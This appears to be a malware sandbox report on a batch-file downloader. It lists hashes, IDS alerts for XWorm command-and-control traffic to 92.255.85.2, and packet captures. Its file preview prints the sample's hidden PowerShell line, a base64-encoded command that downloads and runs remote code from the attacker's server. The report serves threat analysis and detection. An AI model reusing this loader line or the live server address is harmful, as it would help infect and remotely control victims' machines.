                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\strztqek\strztqek.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                Static File Info

                                                General

                                                File type:DOS batch file, ASCII text, with CRLF line terminators
                                                Entropy (8bit):4.905613552394083
                                                TrID:
                                                  File name:92.255.85.2.bat
                                                  File size:290 bytes
                                                  MD5:dba98e15d9d6d186ec7b4029f49691a9
                                                  SHA1:c21a4ab95820f33bff18b333ff33a880f0a7e5dd
                                                  SHA256:3f7b520f93027782e5db0e094dd1924c78e6562eb6156dd5d001ec4076413be4
                                                  SHA512:aeaf2c69841f6e3074377d4aad556915ed37a9af6042350fd868269c4254c9e8d4bbd51e8747fa7a1db88a072f987b25fd333a14ca81a21872dd2c9da67684d0
                                                  SSDEEP:6:hSG80QO0c5I1R3K/odqS/S51LFjh7RzZxktdEOlaAXkQxGRrVRV:0G80Qpc5I1k/odqkg1LFjh7hkBisehRV
                                                  TLSH:13D0E71715D4FC4C87E7340048D7708510CD3507EA31CC545A2214F97CC4384D32B5C8
                                                  File Content Preview:@echo off..powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADg

                                                  File Icon

                                                  Icon Hash:9686878b929a9886

                                                  Network Behavior

                                                  Download Network PCAP: filteredfull

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-03-26T04:16:31.433972+01002860704ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile1192.168.2.44971792.255.85.280TCP
                                                  2025-03-26T04:16:31.629098+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44971792.255.85.280TCP
                                                  2025-03-26T04:16:31.629098+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.44971792.255.85.280TCP
                                                  2025-03-26T04:16:32.921009+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44971792.255.85.280TCP
                                                  2025-03-26T04:16:32.921009+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.44971792.255.85.280TCP
                                                  2025-03-26T04:16:32.921009+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.44971792.255.85.280TCP
                                                  2025-03-26T04:16:43.466077+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:16:43.466077+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:16:49.319060+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:16:49.514320+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:16:49.517689+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:01.479932+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:01.482824+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:13.451658+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:13.453838+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:13.650572+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:25.425533+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:25.428914+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:37.392026+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:37.393662+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:43.466619+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:44.856662+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:44.861673+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:50.030635+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:50.227154+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:50.227234+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:50.421592+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:50.421926+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:50.666373+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:54.840066+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:54.844212+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:17:55.283537+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:17:55.285057+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:07.090159+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:07.092219+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:10.733214+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:10.936247+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:10.937363+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:11.179489+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:13.464004+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:16.467874+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:16.469414+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:26.591249+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:26.594039+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:35.395014+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:35.591181+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:35.596080+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:36.715860+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:36.913478+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:36.913554+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:37.164279+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:42.968290+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:42.969926+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:43.465214+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:54.953471+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:54.956480+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:18:57.312199+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:18:57.317866+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:02.653237+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:02.678853+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:07.043940+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:07.045934+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:13.467848+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:16.762696+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:16.764512+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:18.887479+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:19.083128+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:19.083288+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:19.318764+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:24.279149+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:24.281096+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:26.247568+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:26.249496+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:34.544073+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:34.743055+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:34.743146+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:34.937960+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:37.888014+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:37.889843+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:39.795628+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:39.800308+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:40.235872+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:40.237882+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:43.464364+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:45.185013+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:45.381022+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:45.381284+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:45.617888+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:50.684969+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:50.881516+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:19:50.881600+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:19:51.136493+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:20:02.715303+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:02.717007+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:20:13.465253+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:13.967983+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:13.972424+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:20:15.060706+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:15.062352+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:20:19.015072+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:19.016686+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:20:25.631596+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:25.634097+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:20:27.590423+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:27.592172+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP
                                                  2025-03-26T04:20:31.899017+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.85.24372192.168.2.449722TCP
                                                  2025-03-26T04:20:31.900002+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44972292.255.85.24372TCP

                                                  Network Port Distribution

                                                  • Total Packets: 351
                                                  • 4372 undefined
                                                  • 443 (HTTPS)
                                                  • 80 (HTTP)
                                                  • 53 (DNS)
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 26, 2025 04:16:17.097822905 CET49671443192.168.2.4204.79.197.203
                                                  Mar 26, 2025 04:16:17.144625902 CET4968180192.168.2.42.17.190.73
                                                  Mar 26, 2025 04:16:17.410017967 CET49671443192.168.2.4204.79.197.203
                                                  Mar 26, 2025 04:16:18.019401073 CET49671443192.168.2.4204.79.197.203
                                                  Mar 26, 2025 04:16:19.222534895 CET49671443192.168.2.4204.79.197.203
                                                  Mar 26, 2025 04:16:21.625861883 CET49671443192.168.2.4204.79.197.203
                                                  Mar 26, 2025 04:16:25.867371082 CET49678443192.168.2.420.189.173.27
                                                  Mar 26, 2025 04:16:26.175575018 CET49678443192.168.2.420.189.173.27
                                                  Mar 26, 2025 04:16:26.441230059 CET49671443192.168.2.4204.79.197.203
                                                  Mar 26, 2025 04:16:26.753696918 CET4968180192.168.2.42.17.190.73
                                                  Mar 26, 2025 04:16:26.784961939 CET49678443192.168.2.420.189.173.27
                                                  Mar 26, 2025 04:16:27.988076925 CET49678443192.168.2.420.189.173.27
                                                  Mar 26, 2025 04:16:30.394361019 CET49678443192.168.2.420.189.173.27
                                                  Mar 26, 2025 04:16:31.008301020 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.202579975 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.202754021 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.202980995 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.401839018 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.433971882 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.628999949 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629021883 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629035950 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629049063 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629082918 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629096031 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629097939 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.629097939 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.629108906 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629122972 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629137039 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629151106 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.629165888 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.629165888 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.629190922 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823343992 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823429108 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823443890 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823487043 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823597908 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823662996 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823709011 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823714972 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823729038 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823743105 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823766947 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823776960 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823801994 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823816061 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823834896 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823849916 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823852062 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823863983 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823879957 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823887110 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823893070 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823906898 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823913097 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823920012 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823935032 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823940992 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.823949099 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823964119 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:31.823966026 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:31.824223995 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.018141985 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018167019 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018181086 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018193960 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018207073 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018219948 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018234015 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018269062 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.018361092 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.018542051 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018556118 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018594027 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.018773079 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018831015 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.018906116 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018919945 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018934011 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018948078 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018965960 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.018968105 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018976927 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.018996954 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019025087 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019040108 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019053936 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019068003 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019081116 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019093990 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019098043 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019105911 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019119024 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019128084 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019130945 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019144058 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019157887 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019170046 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019180059 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019181967 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019195080 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019201040 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019210100 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019222975 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019232035 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019236088 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019249916 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019253016 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019273043 CET4971780192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:16:32.019416094 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019566059 CET804971792.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:16:32.019578934 CET804971792.255.85.2192.168.2.4
